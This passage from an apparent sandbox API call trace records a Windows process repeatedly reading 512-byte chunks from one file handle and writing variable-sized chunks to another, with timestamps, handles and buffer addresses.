lpOverlapped=0x0) returned 1 [0022.968] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.968] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.969] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.969] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.970] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.970] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.971] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.976] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.977] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.979] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.982] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.984] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.985] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.986] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.986] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.986] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.987] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.993] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.994] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.994] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.994] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.995] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.995] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.996] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.996] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.997] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.997] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.998] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.998] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.999] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.999] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.000] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.000] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.000] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.001] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.001] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.002] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.002] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.003] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.004] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.004] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.004] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.005] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x321, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.005] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.006] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.006] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.007] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.007] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x338, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.009] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.010] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.011] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.011] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.012] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.012] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x251, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.013] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.014] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.015] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.015] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.016] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.016] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.016] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.017] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.018] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x242, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.019] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.020] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.020] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.022] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.023] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.024] ReadFile (in: hFile=0x2b0, 